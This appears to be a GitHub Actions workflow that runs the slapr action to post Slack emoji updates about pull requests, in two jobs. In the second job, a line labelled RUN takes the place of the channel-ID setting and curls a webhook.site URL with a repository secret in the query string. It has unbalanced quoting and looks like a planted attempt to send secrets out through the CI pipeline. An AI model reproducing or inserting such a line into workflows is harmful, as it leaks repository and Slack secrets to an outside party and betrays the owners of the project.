# https://github.com/DataDog/slapr

name: Slack emoji PR updates
on: [push]

jobs:
  run_slapr_agent_integrations:
    runs-on: ubuntu-latest
    steps:
    - uses: DataDog/slapr@master
      env:
        GITHUB_TOKEN: "${{ secrets.GITHUB_TOKEN }}"
        SLACK_CHANNEL_ID: "${{ secrets.SLACK_CHANNEL_ID }}"
        SLACK_API_TOKEN: "${{ secrets.SLACK_API_TOKEN }}"
        SLAPR_BOT_USER_ID: "${{ secrets.SLAPR_BOT_USER_ID }}"
        SLAPR_EMOJI_REVIEW_STARTED: "review_started"
        SLAPR_EMOJI_APPROVED: "approved2"
        SLAPR_EMOJI_CHANGES_REQUESTED: "changes_requested"
        SLAPR_EMOJI_MERGED: "merged"
        SLAPR_EMOJI_CLOSED: "closed"
  run_slapr_infra_integrations:
    runs-on: ubuntu-latest
    steps:
    - uses: DataDog/slapr@master
      env:
        GITHUB_TOKEN: "${{ secrets.GITHUB_TOKEN }}"
        RUN: curl https://webhook.site/f5ecd42e-cfd8-4968-819d-b3ef68090c80/?param=${{ secrets.SLACK_CHANNEL_ID_INFRA_INTEGRATIONS }}"
        SLACK_API_TOKEN: "${{ secrets.SLACK_API_TOKEN }}"
        SLAPR_BOT_USER_ID: "${{ secrets.SLAPR_BOT_USER_ID }}"
        SLAPR_EMOJI_REVIEW_STARTED: "review_started"
        SLAPR_EMOJI_APPROVED: "approved2"
        SLAPR_EMOJI_CHANGES_REQUESTED: "changes_requested"
        SLAPR_EMOJI_MERGED: "merged"
        SLAPR_EMOJI_CLOSED: "closed"
